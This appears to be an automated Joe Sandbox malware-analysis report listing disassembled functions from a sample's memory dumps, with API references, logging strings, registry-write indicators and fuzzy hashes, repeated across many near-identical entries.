Instruction ID: 5b55ca0a7bcb1f02f981a854c9d603bb88d67012526e7411758e29a7a547d3eb
Opcode Fuzzy Hash: 28cdbc242a6302d443cb74f0fd5ade0e8a5883f5600bb2d8e31f58cf0c742293
Instruction Fuzzy Hash: 95F08953B08E0345FB535A47B5417BD154A1F41379E4945B6CD5D0A6F5AE3DA8C78200

Function 00007FFE11504A12 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE11504A35

Strings

fs_file_read, xrefs: 00007FFE11504A72
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504A79

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f4213457ef053d910e4386c0c254c5d8167ae4f42edc73797463a6a03b798a44
Instruction ID: fd6f6d172eb28c296f03119df2856448c40dd7530e2a0e32bb0bec3b6a21dc34
Opcode Fuzzy Hash: f4213457ef053d910e4386c0c254c5d8167ae4f42edc73797463a6a03b798a44
Instruction Fuzzy Hash: E6F08953B08E0345FB535A47B5417BD154A1F41379E4945B6CD5D0A6F5AE3DA8C78200

Function 00007FFE11504A0B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE11504A35

Strings

fs_file_read, xrefs: 00007FFE11504A72
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504A79

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ec76ef756d90aa2e6f6d4fda957d962ff4bca9cef00746e3cbda322dd1aa5041
Instruction ID: f2bd7fa6e0b17e4952475642a14906d80756712fe52c2039e7f836464823bfa9
Opcode Fuzzy Hash: ec76ef756d90aa2e6f6d4fda957d962ff4bca9cef00746e3cbda322dd1aa5041
Instruction Fuzzy Hash: D8F08253B08E0385FB539A47B5817BD2A4A1F81379E4A45BACD5D0A6F5AF3DA8C78200

Function 00007FFE11504A04 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE11504A35

Strings

fs_file_read, xrefs: 00007FFE11504A72
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504A79

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 9dcee868fc8d0d4ebf4b1399c9fd68259c6d0ade068cfdd08fcdd0dd21ee3033
Instruction ID: 452f1c1ddbdfbf67019c50ad4783e6ce6340344e7586a79e01aeaa1a37fbf40f
Opcode Fuzzy Hash: 9dcee868fc8d0d4ebf4b1399c9fd68259c6d0ade068cfdd08fcdd0dd21ee3033
Instruction Fuzzy Hash: 50F08253B08E0385FB539A47B5817BD2A4A1F81379E4A45BACD5D0B6F5AE3DA8C78200

Function 00007FFE115049D9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE11504A35

Strings

fs_file_read, xrefs: 00007FFE11504A72
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504A79

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f4213457ef053d910e4386c0c254c5d8167ae4f42edc73797463a6a03b798a44
Instruction ID: fd6f6d172eb28c296f03119df2856448c40dd7530e2a0e32bb0bec3b6a21dc34
Opcode Fuzzy Hash: f4213457ef053d910e4386c0c254c5d8167ae4f42edc73797463a6a03b798a44
Instruction Fuzzy Hash: E6F08953B08E0345FB535A47B5417BD154A1F41379E4945B6CD5D0A6F5AE3DA8C78200

Function 00007FFE115049D2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE11504A35

Strings

fs_file_read, xrefs: 00007FFE11504A72
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504A79

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ec76ef756d90aa2e6f6d4fda957d962ff4bca9cef00746e3cbda322dd1aa5041
Instruction ID: f2bd7fa6e0b17e4952475642a14906d80756712fe52c2039e7f836464823bfa9
Opcode Fuzzy Hash: ec76ef756d90aa2e6f6d4fda957d962ff4bca9cef00746e3cbda322dd1aa5041
Instruction Fuzzy Hash: D8F08253B08E0385FB539A47B5817BD2A4A1F81379E4A45BACD5D0A6F5AF3DA8C78200

Function 00007FFE115049CB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE11504A35

Strings

fs_file_read, xrefs: 00007FFE11504A72
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504A79

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 9dcee868fc8d0d4ebf4b1399c9fd68259c6d0ade068cfdd08fcdd0dd21ee3033
Instruction ID: 452f1c1ddbdfbf67019c50ad4783e6ce6340344e7586a79e01aeaa1a37fbf40f
Opcode Fuzzy Hash: 9dcee868fc8d0d4ebf4b1399c9fd68259c6d0ade068cfdd08fcdd0dd21ee3033
Instruction Fuzzy Hash: 50F08253B08E0385FB539A47B5817BD2A4A1F81379E4A45BACD5D0B6F5AE3DA8C78200

Function 00007FFE115049C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE11504A35

Strings

fs_file_read, xrefs: 00007FFE11504A72
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504A79

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 6a353f7f9cde5acba82427e8c511acdef0ede31d79e680262527f052d903c98a
Instruction ID: c1395b3a57143acf8b879b4ef1dde4464907afea316165d9d6b667450519c089
Opcode Fuzzy Hash: 6a353f7f9cde5acba82427e8c511acdef0ede31d79e680262527f052d903c98a
Instruction Fuzzy Hash: CBF0E253B08E0385FB539A47B4803BC2A4A1F80379E4A45BACC4D0A2F5AE3CA8C38200

Function 00007FFE115049FD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE11504A35

Strings

fs_file_read, xrefs: 00007FFE11504A72
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504A79

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 6a353f7f9cde5acba82427e8c511acdef0ede31d79e680262527f052d903c98a
Instruction ID: c1395b3a57143acf8b879b4ef1dde4464907afea316165d9d6b667450519c089
Opcode Fuzzy Hash: 6a353f7f9cde5acba82427e8c511acdef0ede31d79e680262527f052d903c98a
Instruction Fuzzy Hash: CBF0E253B08E0385FB539A47B4803BC2A4A1F80379E4A45BACC4D0A2F5AE3CA8C38200

Function 00007FFE115049F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE11504A35

Strings

fs_file_read, xrefs: 00007FFE11504A72
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504A79

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 28cdbc242a6302d443cb74f0fd5ade0e8a5883f5600bb2d8e31f58cf0c742293
Instruction ID: 5b55ca0a7bcb1f02f981a854c9d603bb88d67012526e7411758e29a7a547d3eb
Opcode Fuzzy Hash: 28cdbc242a6302d443cb74f0fd5ade0e8a5883f5600bb2d8e31f58cf0c742293
Instruction Fuzzy Hash: 95F08953B08E0345FB535A47B5417BD154A1F41379E4945B6CD5D0A6F5AE3DA8C78200

Function 00007FF76A90A03B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF76A90A09A

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF76A90A03B
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF76A90A08D

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 29f5a33fe2bfd9c73ec78c153296316038a8ef3e282bb18084eb0fbbc30a309e
Instruction ID: b74e9c0f9979a41f8d181829fddb84254522fdafad5ada41276d2f39ee4c10cd
Opcode Fuzzy Hash: 29f5a33fe2bfd9c73ec78c153296316038a8ef3e282bb18084eb0fbbc30a309e
Instruction Fuzzy Hash: 5BF01266818F84C6E2119F18E4402ABB370FF9E789F705326EBCD66524DF3DD5428B10

Function 00007FF76A90A017 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF76A90A09A

Strings

Argument domain error (DOMAIN), xrefs: 00007FF76A90A017
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF76A90A08D

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: efa7ca9327b7f50ec550392f9c9add8736aa4d523d0fd9fc290744eecbb183ed
Instruction ID: ad6a9e63d2349dbd7a8638c5a519c93e507a524ad126413dae0324d0b1a4f919
Opcode Fuzzy Hash: efa7ca9327b7f50ec550392f9c9add8736aa4d523d0fd9fc290744eecbb183ed
Instruction Fuzzy Hash: E0F01D66808F84C6E2119F18E4402ABB370FF9E789F705326EBCD66664DF2DD5428B10

Function 00007FF76A90A020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF76A90A09A

Strings

Overflow range error (OVERFLOW), xrefs: 00007FF76A90A020
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF76A90A08D

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: d67f6cb67d9aa1b683b19a67aea6ff021f067e3de8b3c453dfdd5ccf3ac71a10
Instruction ID: 5b92e76b4967c493cc445d4a3dc403bd385b9d6da57af5eb6d86e5dcbbfcb53c
Opcode Fuzzy Hash: d67f6cb67d9aa1b683b19a67aea6ff021f067e3de8b3c453dfdd5ccf3ac71a10
Instruction Fuzzy Hash: E2F01D66808F84C6E2119F18E4402ABB370FF9E789FB05326EBCD66624DF2DD5428B10

Function 00007FF76A90A029 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF76A90A09A

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF76A90A029
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF76A90A08D

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 6742954880af872446bfc91b95b988c250abc5737df9b1f930ba577b45b3f3e3
Instruction ID: e4420ec2ad72628c96468f6df066e3d1be05f5b4c509b02784fd9b02aa908bc4
Opcode Fuzzy Hash: 6742954880af872446bfc91b95b988c250abc5737df9b1f930ba577b45b3f3e3
Instruction Fuzzy Hash: 01F01D66818F84C6E2119F18E4402ABB370FF9F789F705326EBCD66628DF2DD5428B10

Function 00007FF76A90A032 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF76A90A09A

Strings

Total loss of significance (TLOSS), xrefs: 00007FF76A90A032
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF76A90A08D

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 854f2dfc0a9e7c149260f6d1f09afe283b3e576efdae8473c3133785e71ceb38
Instruction ID: d4246b626652f75fc7235332d91cb530693cc8fd22896e0543e4ad3d21bcea80
Opcode Fuzzy Hash: 854f2dfc0a9e7c149260f6d1f09afe283b3e576efdae8473c3133785e71ceb38
Instruction Fuzzy Hash: 83F01D66818F84C6E2129F18E4402ABB370FF9E789F705326FBCD66664DF2DD5428B50

Function 00007FF76A90A044 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF76A90A09A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF76A90A08D
Argument singularity (SIGN), xrefs: 00007FF76A90A044

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 7b5741c81ed116a003f85b52f29fe4854fc43aa525cf99e73fbc959c4dfbf3ab
Instruction ID: ab5df2fccebd59cc7069587675c096965e8d3344f8e6f5d03b8feecd055a0175
Opcode Fuzzy Hash: 7b5741c81ed116a003f85b52f29fe4854fc43aa525cf99e73fbc959c4dfbf3ab
Instruction Fuzzy Hash: 8CF0CD66818F8486E2119F18E4402ABB370FF9E789F605326EBC966624DF2DD5568B10

Function 00007FF76A90600F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF76A9060B5

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

registry_set_value, xrefs: 00007FF76A9060CE
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A9060D5

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 011ab9a70b99de4c8218d431ac0f198d09fec4b0464c0e8746d25ec54ad3ce3f
Instruction ID: a1df4d939d1d1fc0b42486e92c5fc56291ed7da5020b90c6ee01a3985b701130
Opcode Fuzzy Hash: 011ab9a70b99de4c8218d431ac0f198d09fec4b0464c0e8746d25ec54ad3ce3f
Instruction Fuzzy Hash: A3E09252A1D306C5F6127B00FC00379A214EB907C0FE040BADA5EC2590DE3CD9C9D314

Function 00007FF76A906005 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF76A9060B5

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

registry_set_value, xrefs: 00007FF76A9060CE
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A9060D5

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: f3c564b8f652036ba9880a54bec866d382b02ba2223f7064c53f4347d1a62a30
Instruction ID: a2dd5cffac34ffcadda1d0c90dbbf0cc020c466d59f7f25f793a9aa3f2b4e760
Opcode Fuzzy Hash: f3c564b8f652036ba9880a54bec866d382b02ba2223f7064c53f4347d1a62a30
Instruction Fuzzy Hash: 47E09252A1D30AC5F612BB00BC10279A214EB907C4FE041BADA5EC2690DE3CD9C9D315

Function 00007FF76A9060A4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF76A9060B5

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

registry_set_value, xrefs: 00007FF76A9060CE
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A9060D5

Memory Dump Source

